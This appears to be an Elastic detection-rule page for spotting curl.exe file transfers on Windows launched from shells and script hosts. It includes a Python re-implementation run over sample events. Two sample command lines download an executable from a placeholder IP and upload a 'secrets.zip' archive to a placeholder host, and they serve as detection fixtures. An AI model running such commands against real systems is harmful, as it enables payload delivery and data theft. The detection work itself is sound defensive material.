
Potential File Transfer via Curl for Windows

Elastic Detection Rules

Summary
This rule identifies executions of Curl for Windows (curl.exe) whose command line contains 'http', which may indicate an unauthorized file transfer over HTTP. Adversaries abuse Curl to download tooling onto a host or to upload data to an external URL. The rule triggers on process-start events from Windows hosts where curl.exe is launched by a parent process associated with scripting or command execution (shells, script hosts and interpreters), since that lineage is less likely to be a legitimate administrative action; executions initiated by system processes are filtered out. Because curl.exe has shipped with Windows since Windows 10 version 1803, it is available to an attacker on most hosts, so the rule is most useful in environments where Curl usage is uncommon and a baseline of expected callers can be established. Triage should establish whether the parent process and the script or command that invoked Curl are legitimate, check the reputation of the domains contacted, and, if the activity appears malicious, preserve the transferred files and proceed to forensic analysis.
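The following is an added example, not code from the Elastic rule or this page: a small Python re-implementation of the detection logic described above, run over constructed process-start events, plus the first triage step (pulling the contacted domains out of the command line). The parent-process lists, the ECS-style field names and the sample events are assumptions made for the illustration; the actual rule's query and its exact parent list are not reproduced here.

```python
"""Added example (not the Elastic rule's own query): re-implements the
described logic over constructed process-creation events.

Assumed for illustration only: the scripting/command-execution parent list,
the system-process exclusion list, the flat ECS-style field names and the
sample events. None of these are taken from the rule page.
"""
from __future__ import annotations

import re
from typing import Dict, List
from urllib.parse import urlsplit

# Assumed parents "associated with common scripting or command execution".
SCRIPT_HOST_PARENTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}

# Assumed system processes whose curl launches are filtered out.
SYSTEM_PARENTS = {"services.exe", "svchost.exe", "wininit.exe", "lsass.exe"}

# Pull http(s) URLs out of a command line for domain-reputation triage.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

Event = Dict[str, str]


def matches_rule(event: Event) -> bool:
    """True when the event satisfies the rule as described on the page:
    Windows process start of curl.exe, parent is a scripting/command host
    (and not a system process), command line contains 'http'."""
    if event.get("host.os.type") != "windows" or event.get("event.type") != "start":
        return False
    if event.get("process.name", "").lower() != "curl.exe":
        return False
    parent = event.get("process.parent.name", "").lower()
    if parent in SYSTEM_PARENTS or parent not in SCRIPT_HOST_PARENTS:
        return False
    # Case-insensitive substring match, so "HTTPS://..." also qualifies.
    return "http" in event.get("process.command_line", "").lower()


def extract_domains(command_line: str) -> List[str]:
    """Hosts referenced by URLs in the command line (triage helper)."""
    hosts = []
    for url in URL_RE.findall(command_line):
        host = urlsplit(url).hostname
        if host:
            hosts.append(host)
    return hosts


def run(events: List[Event]) -> List[dict]:
    """Evaluate every event and return an alert record per match."""
    alerts = []
    for event in events:
        if matches_rule(event):
            alerts.append({
                "parent": event["process.parent.name"],
                "command_line": event["process.command_line"],
                "domains": extract_domains(event["process.command_line"]),
            })
    return alerts


# Constructed sample events (not real telemetry). 203.0.113.0/24 is a
# documentation range; example.org is a reserved example domain.
SAMPLE_EVENTS: List[Event] = [
    {   # download of a payload from a PowerShell session: should alert
        "host.os.type": "windows", "event.type": "start", "process.name": "curl.exe",
        "process.parent.name": "powershell.exe",
        "process.command_line": r"curl.exe -o C:\Users\Public\update.exe http://203.0.113.5/update.exe",
    },
    {   # upload of an archive from cmd.exe: should alert
        "host.os.type": "windows", "event.type": "start", "process.name": "curl.exe",
        "process.parent.name": "cmd.exe",
        "process.command_line": r'curl.exe -X POST -F "file=@C:\Users\alice\secrets.zip" https://files.example.org/upload',
    },
    {   # no URL in the command line: no alert
        "host.os.type": "windows", "event.type": "start", "process.name": "curl.exe",
        "process.parent.name": "cmd.exe", "process.command_line": "curl.exe --version",
    },
    {   # launched by a system process: filtered out
        "host.os.type": "windows", "event.type": "start", "process.name": "curl.exe",
        "process.parent.name": "svchost.exe",
        "process.command_line": "curl.exe http://203.0.113.9/health",
    },
    {   # not a Windows host: out of scope for this rule
        "host.os.type": "linux", "event.type": "start", "process.name": "curl",
        "process.parent.name": "bash", "process.command_line": "curl http://203.0.113.9/",
    },
]


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(f"[ALERT] parent={alert['parent']} domains={alert['domains']}")
        print(f"        {alert['command_line']}")
```

The exclusion of system parents is checked before the scripting-host allowlist so that a future, broader parent list cannot silently re-admit them. The `extract_domains` output is what an analyst would feed to a reputation lookup in the triage step the summary describes.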
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
  • Windows Registry
  • Network Traffic
  • Application Log
ATT&CK Techniques
  • T1105
Created: 2025-02-03